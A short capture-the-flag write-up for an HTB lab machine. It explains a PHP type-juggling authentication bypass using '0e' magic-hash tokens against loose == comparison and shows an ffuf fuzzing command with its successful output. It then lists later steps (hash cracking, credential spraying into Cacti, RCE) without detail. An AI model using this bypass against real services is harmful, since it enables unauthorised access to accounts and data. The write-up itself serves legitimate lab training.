## https://sploitus.com/exploit?id=22A57A60-EF71-5013-BAE5-9F10F1624668
## Initial Access โ Foothold as `www-data`
### Vulnerability Summary
The target API uses **loose PHP equality (`==`)** instead of strict comparison (`===`).
In PHP, any string starting with `0e` followed by digits is interpreted as **scientific notation**, which evaluates to `0`.
Example:
```php
if ($userToken == $storedToken) {
auth_success();
}
```
A value such as:
```
0e123456
```
is interpreted as:
```
0 == 0
```
Therefore, authentication is bypassed.
Tested on PHP 8.3.27 โ still vulnerable under == comparisons due to type juggling behavior.
### Objective
- Exploit PHP type juggling to:
- Bypass API authentication
- Access restricted data
- Leak MD5 hashes
- Crack credentials
- Spray creds into Cacti
- Achieve RCE and foothold as www-data
## Fuzzing for Magic Hash Tokens
A custom PHP loose-comparison wordlist was uploaded and fuzzed:
```
ffuf -c \
-u "http://monitorsfour.htb/user?token=FUZZ" \
-w php_loose_comparison.txt \
-fw 4
```
Output:
```
0e1234 [Status: 200, Size: 1465, Words: 14, Lines: 1]
```
A 200 OK response confirms successful authentication bypass.
## Result
Authentication bypass successful โ Access obtained as www-data.
This grants access to sensitive data used later for:
- MD5 hash extraction
- Cracking
- Credential spray against Cacti
- Remote Code Execution (RCE)
- Foothold established